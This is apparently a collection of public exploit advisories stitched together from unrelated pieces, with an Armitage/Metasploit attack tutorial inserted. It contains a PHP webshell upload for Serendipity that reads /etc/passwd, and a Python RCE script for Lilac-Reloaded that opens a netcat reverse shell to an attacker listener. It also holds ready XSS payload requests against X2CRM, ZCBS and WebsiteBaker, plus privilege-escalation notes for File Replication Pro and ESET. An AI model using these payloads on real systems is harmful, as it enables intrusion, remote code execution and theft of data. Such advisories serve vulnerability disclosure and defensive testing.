Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b
Connection: close
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[token]"
ae9b8ae35a756c24f9552a021ee81d56
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[action]"
admin
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[adminModule]"
media
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[adminAction]"
add
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar"
Content-Type: application/octet-stream
<?php echo system("cat /etc/passwd");?>
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_filename][1]"
poc.phar
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_directory][1]"
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[column_count][1]"
true
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[imageurl]"
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[imageimporttype]"
image
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_filename][]"
------WebKitFormBoundaryZWKPiba66PSVGQzc
Content-Disposition: form-data; name="serendipity[target_directory][]"
------WebKitFormBoundaryZWKPiba66PSVGQzc--
poc video : https://youtu.be/_VrrKOTywgo
#!/usr/bin/env python
"""
# Exploit Title: Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 2023-04-13
# Exploit Author: max / Zoltan Padanyi
# Vendor Homepage: https://exchange.nagios.org/directory/Addons/Configuration/Lilac-2DReloaded/visit
# Software Link: https://sourceforge.net/projects/lilac--reloaded/files/latest/download
# Version: 2.0.8
# Tested on: Debian 7.6
# CVE : N/A
The autodiscovery feature lacks any kind of input filtering, so we can add our own commands there terminated with a ;
Use at your own risk!
RCA - wild exec is ongoing without any filtering
in library/Net/Traceroute.php
181 function _setTraceroutePath($sysname)
182 {
183 $status = '';
184 $output = array();
185 $traceroute_path = '';
186
187 if ("windows" == $sysname) {
188 return "tracert";
189 } else {
190 $traceroute_path = exec("which traceroute", $output, $status);
[...]
257 function traceroute($host)
258 {
259
260 $argList = $this->_createArgList();
261 $cmd = $this->_traceroute_path." ".$argList[0]." ".$host." ".$argList[1];
262 exec($cmd, $this->_result);
"""
import requests
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="The full path of the autodiscover.php in lilac (i.e. http://127.0.0.1/lilac/autodiscovery.php", required=True)
parser.add_argument("-i", "--ip", help="Listener IP", required=True)
parser.add_argument("-p", "--port", help="Listener port", required=True, type=int)
args = parser.parse_args()
rev_shell = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {args.ip} {args.port} >/tmp/f;"
body = {"request":"autodiscover","job_name":"HackThePlanet","job_description":"HackThePlanet","nmap_binary":rev_shell,"default_template":"","target[2]":"1.1.1.1"}
try:
r = requests.get(args.url)
if r.ok:
print("[+] URL looks good...moving forward...")
print("[+] Sending exploit in...")
r = requests.post(args.url,data=body)
if r.ok:
print("[+] Got HTTP 200, check your listener!")
else:
print("[-] Some kind of error happened, check the http response below!")
print(r.text)
except Exception as e:
print("General exception: " + str(e))
# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)
# Exploit Author: Betul Denizler
# Vendor Homepage: https://x2crm.com/
# Software Link: https://sourceforge.net/projects/x2engine/
# Version: X2CRM v6.6/6.9
# Tested on: Ubuntu Mate 20.04
# Vulnerable Parameter: model
# CVE: Use CVE-2022-48177
# Date: 27.12.2022
'''
POC REQUEST:
========
GET
/x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0)
Gecko/20100101 Firefox/108.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1;
PHPSESSID=959fpkms4abdhtresce9k9rmk3;
YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab;
d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D;
locationTrackingFrequency=60; locationTrackingSwitch=1;
5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D;
sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
EXPLOITATION
========
1. Select Import Records Model in admin settings
2. Inject payload to the vulnerable parameter in GET request
Payload: "><body onload="alert(4)">
'''
Armitage
Armitage is a Java-based Metasploit graphical interface attack software. It can be used to combine exploits known in Metasploit to automate attacks against vulnerabilities existing in the host. Using Metasploit through the command line is more difficult and there are too many commands that need to be memorized. Armitage perfectly solves this problem. Users only need to simply click on the menu to achieve security testing and attacks on the target host. Armitage's good graphic display interface makes the attack process more intuitive and the user experience better. Due to its simplicity of operation, it is especially suitable for beginners of Metasploit to conduct security testing and attacks on target systems.
Start
After startup, it is shown in the figure! If the prompt is error, please enable postgresql in advance
Scan the target
For the scanning of the target, we can use Nmap or Msf to scan!
As shown in the figure, we scanned some devices in the LAN
There are windows devices, printers, and linux devices
At this time, we can scan a device.
You can see the port that is currently enabled by the device.
Start the attack
Right-click to select Scan, Armitage will call Metasploit's vulnerability scanning module, scan the target machine in a direction, find existing vulnerabilities, and provide a reference for the next step of determining the attack method:
After success, we will find that the device icon will change
Of course, we can also use various exps given by the system to attack!
# Exploit Title: File Replication Pro 7.5.0 - Privilege Escalation/Password reset due Incorrect Access Control
# Date: 2023-04-13
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: http://www.diasoft.net - https://www.filereplicationpro.com
# Software Link: http://www.filereplicationpro.com/install/InstData/Windows_64_Bit/VM/frpro.exe
# Version: 7.5.0
# Tested on: Windows 10 Pro 22H2 x64
# CVE: CVE-2023-26918
Incorrect file/folder permissions in Diasoft Corporation's File Replication Pro 7.5.0 allow privilege escalation by
replacing a file with another one that will be executed with "LocalSystem" rights from Windows Services application.
C:\Program Files>icacls "c:\Program Files\FileReplicationPro"
c:\Program Files\FileReplicationPro Everyone:(F)
Everyone:(OI)(CI)(IO)(F)
C:\Users\Administrator>sc qc frp
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: frp
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : "C:\Program Files\FileReplicationPro\prunsrv.exe" //RS//frp
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : FRPReplicationServer
DIPENDENZE : Tcpip
: Afd
SERVICE_START_NAME : LocalSystem
To exploit the vulnerability a malicious actor/process must weaponize or replace the prunsrv.exe executable that runs
with LocalSystem privileges as "frp" (FRPReplicationServer) service, since the application's path has "Everyone" full
access permissions.
Moreover, the "properties.xml" file in the "etc" folder inside program's path contains the hashed password for remote
access stored in sha1(base64) value, that is possible to modify. Replacing it with a new hash, generated by encrypting
a string in SHA-1 and encoding its digest via base64, will grant the login access on the application's web interface.
# Exploit Title: X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Author: Betul Denizler
# Vendor Homepage: https://x2crm.com/
# Software Link: https://sourceforge.net/projects/x2engine/
# Version: X2CRM v6.6/6.9
# Tested on: Ubuntu Mate 20.04
# Vulnerable Parameter: Actions[subject]
# CVE: CVE-2022-48178
# Date: 27.12.2022
'''
POC REQUEST:
========
POST /c2xrm/x2engine/index.php/actions/update?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0)
Gecko/20100101 Firefox/108.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 172
Origin: http://localhost
Connection: close
Referer:
http://localhost/c2xrm/x2engine/index.php/actions/viewAction?id=1
Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1;
PHPSESSID=kg3n7kcjqtm29fc7n4m72m0bt5;
YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab;
5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D;
d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D;
sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsr
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=test
EXPLOITATION
========
1. Create an action
2. Inject payload to the vulnerable parameter in POST request
Payload: %3Cscript%3Ealert(1)%3C%2Fscript%3E
'''
# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)
# Date: 2023-03-30
# CVE: CVE-2023-26692
# Exploit Author: Abdulaziz Saad (@b4zb0z)
# Vendor Homepage: https://www.zcbs.nl
# Version: 4.14k
# Tested on: LAMP, Ubuntu
# Google Dork: inurl:objecten.pl?ident=3D
---
[#] Vulnerability :
`$_GET['ident']`
[#] Exploitation :
`https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror=
=3Dalert(%22XSS%22)%3E`
Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)
Application: WebsiteBaker
Version: 2.13.3
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 02.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1.Anyone who has the authority to create the page can do this
payload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
POST /admin/pages/add.php HTTP/1.1
Host: localhost
Content-Length: 137
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9
Connection: close
b7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add
2. Visit http://localhost/
# Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Exploit Date: 2023-04-05
# Vendor : https://www.eset.com
# Version : 16.0.26.0
# Tested on OS: Microsoft Windows 11 pro x64
#PoC :
==============
C:\>sc qc ekrn
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ekrn
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe"
LOAD_ORDER_GROUP : Base
TAG : 0
DISPLAY_NAME : ESET Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem